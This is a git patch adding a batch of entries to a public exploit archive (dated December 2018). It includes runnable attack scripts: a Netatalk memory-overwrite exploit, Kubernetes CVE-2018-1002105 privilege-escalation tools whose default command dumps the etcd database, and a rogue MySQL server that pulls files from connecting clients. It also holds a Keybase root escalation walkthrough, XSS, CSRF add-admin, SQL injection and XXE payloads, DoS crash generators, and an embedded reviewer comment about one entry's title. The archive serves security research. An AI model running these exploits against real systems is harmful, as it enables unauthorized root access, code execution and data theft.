From 1b31850a46276d56a724cd47ea55403f8f9697eb Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 25 Dec 2018 05:01:44 +0000 Subject: [PATCH] DB: 2018-12-25 15 changes to exploits/shellcodes Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) Google Chrome 70 - SQLite Magellan Crash (PoC) Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read Keybase keybase-redirector - '$PATH' Local Privilege Escalation Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC) Netatalk - Bypass Authentication Kubernetes - (Unauthenticated) Arbitrary Requests Kubernetes - (Authenticated) Arbitrary Requests WSTMart 2.0.8 - Cross-Site Scripting WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read PhpSpreadsheet < 1.5.0 - XML External Entity (XXE) Linux/x86 - Kill All Processes Shellcode (14 bytes) --- exploits/linux/dos/46038.py | 24 +++ exploits/linux/local/46044.md | 94 +++++++++++ exploits/multiple/dos/46042.html | 136 ++++++++++++++++ exploits/multiple/remote/46048.py | 44 +++++ exploits/multiple/remote/46052.py | 169 +++++++++++++++++++ exploits/multiple/remote/46053.py | 132 +++++++++++++++ exploits/php/webapps/46035.txt | 25 +++ exploits/php/webapps/46036.txt | 51 ++++++ exploits/php/webapps/46037.txt | 37 +++++ exploits/php/webapps/46041.py | 260 ++++++++++++++++++++++++++++++ exploits/php/webapps/46050.txt | 42 +++++ exploits/windows/dos/46002.py | 20 +-- exploits/windows/local/46040.txt | 23 +++ exploits/windows/local/46051.txt | 2 + files_exploits.csv | 13 ++ files_shellcodes.csv | 1 + shellcodes/linux/46039.c | 42 +++++ 17 files changed, 1105 insertions(+), 10 deletions(-) create mode 100755 exploits/linux/dos/46038.py create mode 100644 exploits/linux/local/46044.md create mode 100644 exploits/multiple/dos/46042.html create mode 100755 exploits/multiple/remote/46048.py create mode 100755 exploits/multiple/remote/46052.py create mode 100755 exploits/multiple/remote/46053.py create mode 
100644 exploits/php/webapps/46035.txt create mode 100644 exploits/php/webapps/46036.txt create mode 100644 exploits/php/webapps/46037.txt create mode 100755 exploits/php/webapps/46041.py create mode 100644 exploits/php/webapps/46050.txt create mode 100644 exploits/windows/local/46040.txt create mode 100644 exploits/windows/local/46051.txt create mode 100644 shellcodes/linux/46039.c diff --git a/exploits/linux/dos/46038.py b/exploits/linux/dos/46038.py new file mode 100755 index 000000000..598c0a60b --- /dev/null +++ b/exploits/linux/dos/46038.py @@ -0,0 +1,24 @@ +# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) +# Discovery by: Mr Winst0n +# Discovery Date: 2018-12-22 +# Vendor Homepage: https://angryip.org/ +# Software Link : https://angryip.org/download/ +# Tested Version: 3.5.3 (latest version) +# Tested on: Kali linux +# Vulnerability Type: Denial of Service (DoS) + +# Steps to Produce the Crash: +# 1.- Run python code : python angryip.py +# 2.- Open Xangry.txt and copy content to clipboard +# 3.- Open Angry IP Scanner +# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports", +# 5.- Paste ClipBoard on "Port selection", and click on "OK", +# 6.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 384 +crash = buffer + "BBBB" + "CCCC" +f = open("Xangry.txt", "w") +f.write(crash) +f.close() \ No newline at end of file diff --git a/exploits/linux/local/46044.md b/exploits/linux/local/46044.md new file mode 100644 index 000000000..53de5c02d --- /dev/null +++ b/exploits/linux/local/46044.md 
@@ -0,0 +1,94 @@ +keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application to executing a custom fusermount binary as root. + +## Environment + +CentOS Linux release 7.4.1708 (Core) +3.10.0-693.17.1.el7.x86_64 + +RPM info + +``` +Name : keybase +Version : 2.8.0.20181017144746.3efc4cbf3c +Release : 1 +Architecture: x86_64 +Install Date: Mon 22 Oct 2018 05:30:36 PM EDT +Group : Unspecified +Size : 273302678 +License : BSD +Signature : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7 +Source RPM : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm +Build Date : Wed 17 Oct 2018 10:54:47 AM EDT +Build Host : 6ae61e160e87 +Relocations : (not relocatable) +Summary : Keybase command line client +Description : +Keybase command line client +``` + +An unprivileged user named user1 is used for this PoC. + +## Steps to reproduce + +1) Display privileges of user 1 - execute the id command + +``` +[user1@localhost woot]$ id +uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 +``` + +2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed. + +``` +cat >fusermount.c< +#include +#include +#include + +int main(int argc, char **argv) +{ + setreuid(0,0); + system("/usr/bin/touch /w00t"); + return(0); +} +EOF +`` + +3) Compile fusermount.c + +``` +gcc -Wall fusermount.c -o fusermount +``` + +4) Verify that /w00t does not exist. + +``` +[user1@localhost woot]$ ls -ld /w00t +ls: cannot access /w00t: No such file or directory +``` + +5) Prepend the PATH environment variable with a dot(for current working directory) and execute keybase-redirector which in turn will execute the malicious fusermount binary as root. 
+ +``` +env PATH=.:$PATH /usr/bin/keybase-redirector /keybase +``` + +6) Enter the control-c sequence to kill the application. + +``` +[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase +^C +``` + +7) Verify that /w00t exists + +``` +[user1@localhost woot]$ ls -ld /w00t +-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t +[user1@localhost woot]$ +``` + +## Impact + +Unauthorized root access is possible which impacts the confidentially, integrity, and availability of the system. \ No newline at end of file diff --git a/exploits/multiple/dos/46042.html b/exploits/multiple/dos/46042.html new file mode 100644 index 000000000..c2e7868dc --- /dev/null +++ b/exploits/multiple/dos/46042.html @@ -0,0 +1,136 @@ + + +

This proof-of-concept crashes the Chrome renderer process using Tencent Blade Team's Magellan SQLite3 bug. It's based on a SQLite test case from the commit that fixed the bug.

+ +

If you're using Chrome 70 or below, tap the button below to crash this page:

+ +

Your browser's user agent is: not available without JavaScript. Turn it on!

+ +

Source code for this page on GitHub.

+ +

Sign up for more information

+

I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:

+
+ + + +
+ +

What's supposed to happen?

+

After you press the button, the page should crash:

+

screenshot

+

On Android 5.1, I get a segfault in memcpy:

+
+        F/libc    ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread)
+        I/DEBUG   (  142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+        I/DEBUG   (  142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys'
+        I/DEBUG   (  142): Revision: '0'
+        I/DEBUG   (  142): ABI: 'arm'
+        I/DEBUG   (  142): pid: 3801, tid: 3854, name: Database thread  >>> com.android.chrome:sandboxed_process6 <<<
+        I/DEBUG   (  142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
+        I/DEBUG   (  142):     r0 e0ddb457  r1 611be0ab  r2 00000002  r3 ff000000
+        I/DEBUG   (  142):     r4 611be038  r5 00000002  r6 611be0a9  r7 7fffffff
+        I/DEBUG   (  142):     r8 00000001  r9 611be0ab  sl 80000001  fp 00000000
+        I/DEBUG   (  142):     ip 00000066  sp 6defd3a0  lr 00000074  pc 4025eb62  cpsr 680f2430
+        I/DEBUG   (  142): 
+        I/DEBUG   (  142): backtrace:
+        I/DEBUG   (  142):     #00 pc 0000fb62  /system/lib/libc.so (__memcpy_base+217)
+        I/DEBUG   (  142):     #01 pc 018d0e1d  /data/app/com.android.chrome-1/base.apk
+
+ +

What's affected?

+

Affected: tested, causes one tab/one window to crash:

+
    +
  • Chrome 70.0.3538.110 on Android 5.1 and 9
  • +
  • Electron 2.0.12 on macOS 10.14
  • +
+

Not affected:

+
    +
  • Chrome 71.0.3578.98 on Android 8.1 (already fixed)
  • +
  • Safari (doesn't have FTS enabled in SQLite3)
  • +
  • Browsers not based on Chrome (no WebSQL support)
  • +
+ + \ No newline at end of file diff --git a/exploits/multiple/remote/46048.py b/exploits/multiple/remote/46048.py new file mode 100755 index 000000000..f1c21560f --- /dev/null +++ b/exploits/multiple/remote/46048.py 
@@ -0,0 +1,44 @@ +import socket +import struct +import sys +if len(sys.argv) != 3: + sys.exit(0) +ip = sys.argv[1] +port = int(sys.argv[2]) +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + ip + ":" + sys.argv[2] +sock.connect((ip, port)) +dsi_payload = "\x00\x00\x40\x00" # client quantum +dsi_payload += '\x00\x00\x00\x00' # overwrites datasize +dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum +dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids +dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr +dsi_opensession = "\x01" # attention quantum option +dsi_opensession += struct.pack("B", len(dsi_payload)) # length +dsi_opensession += dsi_payload +dsi_header = "\x00" # "request" flag +dsi_header += "\x04" # open session command +dsi_header += "\x00\x01" # request id +dsi_header += "\x00\x00\x00\x00" # data offset +dsi_header += struct.pack(">I", len(dsi_opensession)) +dsi_header += "\x00\x00\x00\x00" # reserved +dsi_header += dsi_opensession +sock.sendall(dsi_header) +resp = sock.recv(1024) +print "[+] Open Session complete" +afp_command = "\x01" # invoke the second entry in the table +afp_command += "\x00" # protocol defined padding +afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry +afp_command += struct.pack("Q", 0x4295f0) # address to jump to +dsi_header = "\x00" # "request" flag +dsi_header += "\x02" # "AFP" command +dsi_header += "\x00\x02" # request id +dsi_header += "\x00\x00\x00\x00" # data offset +dsi_header += struct.pack(">I", len(afp_command)) +dsi_header += '\x00\x00\x00\x00' # reserved +dsi_header += afp_command +print "[+] Sending get server info request" +sock.sendall(dsi_header) +resp = sock.recv(1024) +print resp +print "[+] Fin." \ No newline at end of file diff --git a/exploits/multiple/remote/46052.py b/exploits/multiple/remote/46052.py new file mode 100755 index 000000000..2469c0927 --- /dev/null +++ b/exploits/multiple/remote/46052.py 
@@ -0,0 +1,169 @@ +#!/usr/bin/env python3 +import argparse +from ssl import wrap_socket +from json import loads, dumps +from socket import create_connection + + +def request_stage_1(base, version, target): + + stage_1 = "" + + with open('ustage_1', 'r') as stage_1_fd: + stage_1 = stage_1_fd.read() + + return stage_1.format(base, version, target + ).encode('utf-8') + + +def request_stage_2(base, version, target_api, target): + + stage_2 = "" + + with open('ustage_2', 'r') as stage_2_fd: + stage_2 = stage_2_fd.read() + + return stage_2.format(base, version, target_api, target, + ).encode('utf-8') + + +def read_data(ssock): + + data = [] + data_incoming = True + + while data_incoming: + data_in = ssock.recv(4096) + + if not data_in: + data_incoming = False + + elif data_in.find(b'\n\r\n0\r\n\r\n') != -1: + data_incoming = False + + offset_1 = data_in.find(b'{') + offset_2 = data_in.find(b'}\n') + + if offset_1 != -1 and offset_2 != -1: + data_in = data_in[offset_1-1:offset_2+1] + + elif offset_1 != -1: + data_in = data_in[offset_1-1:] + + elif offset_2 != -1: + data_in = data_in[:offset_2-1] + + data.append(data_in) + + return data + + +def run_exploit(target, stage_1, stage_2, filename, json): + + host, port = target.split(':') + + with create_connection((host, port)) as sock: + + with wrap_socket(sock) as ssock: + print('[*] Building pipe ...') + ssock.send(stage_1) + + data_in = ssock.recv(15) + + if b'HTTP/1.1 200 OK' in data_in: + print('[+] Pipe opened :D') + read_data(ssock) + + else: + print('[-] Not sure if this went well...') + + print(f"[*] Attempting to access url") + + ssock.send(stage_2) + data_in = ssock.recv(15) + + if b'HTTP/1.1 200 OK' in data_in: + print('[+] Pipe opened :D') + + data = read_data(ssock) + + return data + + +def parse_output(data, json, filename): + + if json: + j = loads(''.join(i.decode('utf-8') + for i in data)) + + data = dumps(j, indent=4) + + if filename: + mode = 'w+' + + else: + mode = 'wb+' + + if filename: + print(f"[*] 
Writing output to (unknown) ....") + + with open(filename, mode) as fd: + if json: + fd.write(data) + + else: + for msg in data: + fd.write(msg) + + print('[+] Done!') + + else: + if json: + print(data) + + else: + print(''.join(msg.decode('unicode_escape') for msg in data)) + + +def main(): + + parser = argparse.ArgumentParser(description='Unauthenticated PoC for' + ' CVE-2018-1002105') + required = parser.add_argument_group('required arguments') + optional = parser.add_argument_group('optional arguments') + + required.add_argument('--target', '-t', dest='target', type=str, + help='API server target:port', required=True) + required.add_argument('--api-base', '-b', dest='base', type=str, + help='Target API name i.e. "servicecatalog.k8s.io"', + default="servicecatalog.k8s.io") + required.add_argument('--api-target', '-u', dest='target_api', type=str, + help='API to access i.e. "clusterservicebrokers"', + default="clusterservicebrokers") + + optional.add_argument('--api-version', '-a', dest='version', type=str, + help='API version to use i.e. "v1beta1"', + default="v1beta1") + optional.add_argument('--json', '-j', dest='json', action='store_true', + help='Print json output', default=False) + optional.add_argument('--filename', '-f', dest='filename', type=str, + help='File to save output to', default=False) + + args = parser.parse_args() + + if args.target.find(':') == -1: + print("f[-] invalid target {args.target}") + return False + + stage1 = request_stage_1(args.base, args.version, args.target) + + stage2 = request_stage_2(args.base, args.version, args.target_api, + args.target) + + output = run_exploit(args.target, stage1, stage2, args.filename, args.json) + + parse_output(output, args.json, args.filename) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/46053.py b/exploits/multiple/remote/46053.py new file mode 100755 index 000000000..3e098d337 --- /dev/null +++ b/exploits/multiple/remote/46053.py 
@@ -0,0 +1,132 @@ +#!/usr/bin/env python3 +import argparse +from ssl import wrap_socket +from socket import create_connection +from secrets import base64, token_bytes + + +def request_stage_1(namespace, pod, method, target, token): + + stage_1 = "" + + with open('stage_1', 'r') as stage_1_fd: + stage_1 = stage_1_fd.read() + + return stage_1.format(namespace, pod, method, target, + token).encode('utf-8') + + +def request_stage_2(target, namespace, pod, container, command): + + stage_2 = "" + + command = f"command={'&command='.join(command.split(' '))}" + + with open('stage_2', 'r') as stage_2_fd: + stage_2 = stage_2_fd.read() + + key = base64.b64encode(token_bytes(20)).decode('utf-8') + + return stage_2.format(namespace, pod, container, command, + target, key).encode('utf-8') + + +def run_exploit(target, stage_1, stage_2, method, filename, ppod, + container): + + host, port = target.split(':') + + with create_connection((host, port)) as sock: + + with wrap_socket(sock) as ssock: + print(f"[*] Building pipe using {method}...") + ssock.send(stage_1) + + if b'400 Bad Request' in ssock.recv(4096): + print('[+] Pipe opened :D') + + else: + print('[-] Not sure if this went well...') + + print(f"[*] Attempting code exec on {ppod}/{container}") + ssock.send(stage_2) + + if b'HTTP/1.1 101 Switching Protocols' not in ssock.recv(4096): + print('[-] Exploit failed :(') + + return False + + data_incoming = True + + data = [] + + while data_incoming: + data_in = ssock.recv(4096) + data.append(data_in) + + if not data_in: + data_incoming = False + + if filename: + print(f"[*] Writing output to (unknown) ....") + + with open(filename, 'wb+') as fd: + for msg in data: + fd.write(msg) + + print('[+] Done!') + + else: + print(''.join(msg.decode('unicode-escape') + for msg in data)) + + +def main(): + + parser = argparse.ArgumentParser(description='PoC for CVE-2018-1002105.') + + required = parser.add_argument_group('required arguments') + optional = 
parser.add_argument_group('optional arguments') + + required.add_argument('--target', '-t', dest='target', type=str, + help='API server target:port', required=True) + required.add_argument('--jwt', '-j', dest='token', type=str, + help='JWT token for service account', required=True) + required.add_argument('--namespace', '-n', dest='namespace', type=str, + help='Namespace with method access', + default='default') + required.add_argument('--pod', '-p', dest='pod', type=str, + required=True, help='Pod with method access') + required.add_argument('--method', '-m', dest='method', choices=['exec', + 'portforward', 'attach'], required=True) + + optional.add_argument('--privileged-namespace', '-s', dest='pnamespace', + help='Target namespace', default='kube-system') + optional.add_argument('--privileged-pod', '-e', dest='ppod', type=str, + help='Target privileged pod', + default='etcd-kubernetes') + optional.add_argument('--container', '-c', dest='container', type=str, + help='Target container', default='etcd') + optional.add_argument('--command', '-x', dest='command', type=str, + help='Command to execute', + default='/bin/cat /var/lib/etcd/member/snap/db') + optional.add_argument('--filename', '-f', dest='filename', type=str, + help='File to save output to', default=False) + + args = parser.parse_args() + + if args.target.find(':') == -1: + print(f"[-] invalid target {args.target}") + return False + + stage1 = request_stage_1(args.namespace, args.pod, args.method, args.target, + args.token) + stage2 = request_stage_2(args.target, args.pnamespace, args.ppod, + args.container, args.command) + + run_exploit(args.target, stage1, stage2, args.method, args.filename, + args.ppod, args.container) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/46035.txt b/exploits/php/webapps/46035.txt new file mode 100644 index 000000000..c69ee6b46 --- /dev/null +++ b/exploits/php/webapps/46035.txt 
@@ -0,0 +1,25 @@ +# Exploit Title: WSTMart 2.0.8 - Cross-Site Scripting +# Date: 2018-12-23 +# Exploit Author: linfeng +# Vendor Homepage: https://github.com/wstmall/wstmart/ +# Software Link: http://www.wstmart.net/ +# Version: WSTMart 2.0.8_181212 +# CVE: CVE-2018-20367 + +# 0x01 stored XSS (PoC) +Function point: mall some commodity details - commodity consultation +poc: +POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 +Accept: / +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 83 +Connection: close +Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454 + +goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E \ No newline at end of file diff --git a/exploits/php/webapps/46036.txt b/exploits/php/webapps/46036.txt new file mode 100644 index 000000000..065fdc3bb --- /dev/null +++ b/exploits/php/webapps/46036.txt @@ -0,0 +1,51 @@ +# Exploit Title: WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) +# Date: 2018-12-23 +# Exploit Author: linfeng +# Vendor Homepage:https://github.com/wstmall/wstmart/ +# Software Link:http://www.wstmart.net/ +# Version: WSTMart 2.0.8_181212 +# CVE :CVE-2018-19138 + +# 0x02 CSRF PoC +# 18/5000 +# Function point: background management - staff management - login account +# poc: +# 1234.html + + + + + + Document + + +
+ + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/46037.txt b/exploits/php/webapps/46037.txt new file mode 100644 index 000000000..ca2d57eb5 --- /dev/null +++ b/exploits/php/webapps/46037.txt @@ -0,0 +1,37 @@ +# Exploit Title: FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection +# Google Dork: N/A +# Date: 2018-12-22 +# Exploit Author: Sainadh Jamalpur +# Vendor Homepage: http://frontaccounting.com/ +# Software Link: https://sourceforge.net/projects/frontaccounting/ +# Version: 2.4.5 +# Tested on: XAMPP version 3.2.2 in Windows 10 64bit, Kali linux X64 +# CVE : N/A + +# ========================= Vendor Summery ===================== +# +# FrontAccounting (FA) is a professional web-based Accounting system for +# the entire ERP chain written in PHP, using MySQL. FA is multilingual and +# multicurrency. +# +# ======================== Vulnerability Description =============== +# +# the parameter "filterType" in /attachments.php is Vulnerable to Time +# Based Blind SQL Injection. +# +# ======================== PoC ======================================= + +POST /frontaccounting/admin/attachments.php? HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: http://localhost/frontaccounting/admin/attachments.php? +Content-Type: application/x-www-form-urlencoded +Content-Length: 367 +DNT: 1 +Connection: close +Cookie: +Upgrade-Insecure-Requests: 1 +user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx \ No newline at end of file 
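Review bot: the title of exploits/php/webapps/46037.txt (and the commit message entry "FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection") names the wrong parameter: the Vulnerability Description says `the parameter "filterType" in /attachments.php is Vulnerable to Time Based Blind SQL Injection`, and the PoC body carries the payload in `filterType=(select*from(select(sleep(20)))a)`, while `SubmitUser` is only the login button's value. Rename the entry to 'filterType'. Also fix `Vendor Summery` to `Vendor Summary`, and trim the request body, which repeats `_token`, `_focus`, `_modified` and `_confirmed` as if the login form and the attachments form were pasted together; a minimal request makes the injected parameter obvious to whoever has to verify the fix.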
diff --git a/exploits/php/webapps/46041.py b/exploits/php/webapps/46041.py new file mode 100755 index 000000000..20f6cfac4 --- /dev/null +++ b/exploits/php/webapps/46041.py 
@@ -0,0 +1,260 @@ +#!/usr/bin/env python +#coding: utf8 + + +import socket +import asyncore +import asynchat +import struct +import random +import logging +import logging.handlers + + + +PORT = 3306 + +log = logging.getLogger(__name__) + +log.setLevel(logging.DEBUG) +tmp_format = logging.handlers.WatchedFileHandler('mysql.log', 'ab') +tmp_format.setFormatter(logging.Formatter("%(asctime)s:%(levelname)s:%(message)s")) +log.addHandler( + tmp_format +) + +filelist = ( +# r'c:\boot.ini', + r'c:\windows\win.ini', +# r'c:\windows\system32\drivers\etc\hosts', +# '/etc/passwd', +# '/etc/shadow', +) + + +#================================================ +#=======No need to change after this lines======= +#================================================ + +__author__ = 'Gifts' + +def daemonize(): + import os, warnings + if os.name != 'posix': + warnings.warn('Cant create daemon on non-posix system') + return + + if os.fork(): os._exit(0) + os.setsid() + if os.fork(): os._exit(0) + os.umask(0o022) + null=os.open('/dev/null', os.O_RDWR) + for i in xrange(3): + try: + os.dup2(null, i) + except OSError as e: + if e.errno != 9: raise + os.close(null) + + +class LastPacket(Exception): + pass + + +class OutOfOrder(Exception): + pass + + +class mysql_packet(object): + packet_header = struct.Struct('> 16, 0, self.packet_num) + + result = "{0}{1}".format( + header, + self.payload + ) + return result + + def __repr__(self): + return repr(str(self)) + + @staticmethod + def parse(raw_data): + packet_num = ord(raw_data[0]) + payload = raw_data[1:] + + return mysql_packet(packet_num, payload) + + +class http_request_handler(asynchat.async_chat): + + def __init__(self, addr): + asynchat.async_chat.__init__(self, sock=addr[0]) + self.addr = addr[1] + self.ibuffer = [] + self.set_terminator(3) + self.state = 'LEN' + self.sub_state = 'Auth' + self.logined = False + self.push( + mysql_packet( + 0, + "".join(( + '\x0a', # Protocol + '3.0.0-Evil_Mysql_Server' + '\0', # Version + 
#'5.1.66-0+squeeze1' + '\0', + '\x36\x00\x00\x00', # Thread ID + 'evilsalt' + '\0', # Salt + '\xdf\xf7', # Capabilities + '\x08', # Collation + '\x02\x00', # Server Status + '\0' * 13, # Unknown + 'evil2222' + '\0', + )) + ) + ) + + self.order = 1 + self.states = ['LOGIN', 'CAPS', 'ANY'] + + def push(self, data): + log.debug('Pushed: %r', data) + data = str(data) + asynchat.async_chat.push(self, data) + + def collect_incoming_data(self, data): + log.debug('Data recved: %r', data) + self.ibuffer.append(data) + + def found_terminator(self): + data = "".join(self.ibuffer) + self.ibuffer = [] + + if self.state == 'LEN': + len_bytes = ord(data[0]) + 256*ord(data[1]) + 65536*ord(data[2]) + 1 + if len_bytes < 65536: + self.set_terminator(len_bytes) + self.state = 'Data' + else: + self.state = 'MoreLength' + elif self.state == 'MoreLength': + if data[0] != '\0': + self.push(None) + self.close_when_done() + else: + self.state = 'Data' + elif self.state == 'Data': + packet = mysql_packet.parse(data) + try: + if self.order != packet.packet_num: + raise OutOfOrder() + else: + # Fix ? 
+ self.order = packet.packet_num + 2 + if packet.packet_num == 0: + if packet.payload[0] == '\x03': + log.info('Query') + + filename = random.choice(filelist) + PACKET = mysql_packet( + packet, + '\xFB{0}'.format(filename) + ) + self.set_terminator(3) + self.state = 'LEN' + self.sub_state = 'File' + self.push(PACKET) + elif packet.payload[0] == '\x1b': + log.info('SelectDB') + self.push(mysql_packet( + packet, + '\xfe\x00\x00\x02\x00' + )) + raise LastPacket() + elif packet.payload[0] in '\x02': + self.push(mysql_packet( + packet, '\0\0\0\x02\0\0\0' + )) + raise LastPacket() + elif packet.payload == '\x00\x01': + self.push(None) + self.close_when_done() + else: + raise ValueError() + else: + if self.sub_state == 'File': + log.info('-- result') + log.info('Result: %r', data) + + if len(data) == 1: + self.push( + mysql_packet(packet, '\0\0\0\x02\0\0\0') + ) + raise LastPacket() + else: + self.set_terminator(3) + self.state = 'LEN' + self.order = packet.packet_num + 1 + + elif self.sub_state == 'Auth': + self.push(mysql_packet( + packet, '\0\0\0\x02\0\0\0' + )) + raise LastPacket() + else: + log.info('-- else') + raise ValueError('Unknown packet') + except LastPacket: + log.info('Last packet') + self.state = 'LEN' + self.sub_state = None + self.order = 0 + self.set_terminator(3) + except OutOfOrder: + log.warning('Out of order') + self.push(None) + self.close_when_done() + else: + log.error('Unknown state') + self.push('None') + self.close_when_done() + + +class mysql_listener(asyncore.dispatcher): + def __init__(self, sock=None): + asyncore.dispatcher.__init__(self, sock) + + if not sock: + self.create_socket(socket.AF_INET, socket.SOCK_STREAM) + self.set_reuse_addr() + try: + self.bind(('', PORT)) + except socket.error: + exit() + + self.listen(5) + + def handle_accept(self): + pair = self.accept() + + if pair is not None: + log.info('Conn from: %r', pair[1]) + tmp = http_request_handler(pair) + + +z = mysql_listener() +daemonize() +asyncore.loop() \ No newline at 
end of file diff --git a/exploits/php/webapps/46050.txt b/exploits/php/webapps/46050.txt new file mode 100644 index 000000000..259a54a2b --- /dev/null +++ b/exploits/php/webapps/46050.txt 
@@ -0,0 +1,42 @@ +# Product Description +PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc. + +# Vulnerabilities List +One vulnerability was identified within the PhpSpreadsheet library. + +# Affected Version +Versions <=1.5.0 + +# Solution +Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan. + +This vulnerability is described in the following section. + +# XML External Entity (XXE) Injection +The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem. + +# Vulnerability Details +CVE ID: CVE-2018-19277 + +Access Vector: Network + +Security Risk: High + +Vulnerability: CWE-611 + +CVSS Base Score: 7.7 + +CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + +The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload: + + +``` + + +%aaa;%ccc;%ddd;]> +``` + +The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped. + +When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed. 
\ No newline at end of file diff --git a/exploits/windows/dos/46002.py b/exploits/windows/dos/46002.py index 4757cb322..0e4a2f844 100755 --- a/exploits/windows/dos/46002.py +++ b/exploits/windows/dos/46002.py @@ -1,13 +1,13 @@ # Exploit Title: AnyBurn -# Date: 15-12-2018=20 +# Date: 15-12-2018 # Vendor Homepage: http://www.anyburn.com/ # Software Link : http://www.anyburn.com/anyburn_setup.exe # Exploit Author: Achilles # Tested Version: 4.3 (32-bit) # Tested on: Windows 7 x64 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow -=20 -# Steps to Produce the Crash:=20 + +# Steps to Produce the Crash: # 1.- Run python code : AnyBurn.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open AnyBurn choose 'Copy disk to Image' @@ -16,13 +16,13 @@ #!/usr/bin/env python -buffer =3D "\x41" * 10000 +buffer = "\x41" * 10000 try: -=09f=3Dopen("Evil.txt","w") -=09print "[+] Creating %s bytes evil payload.." %len(buffer) -=09f.write(buffer) -=09f.close() -=09print "[+] File created!" + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" except: -=09print "File cannot be created" \ No newline at end of file + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46040.txt b/exploits/windows/local/46040.txt new file mode 100644 index 000000000..e505c00b7 --- /dev/null +++ b/exploits/windows/local/46040.txt 
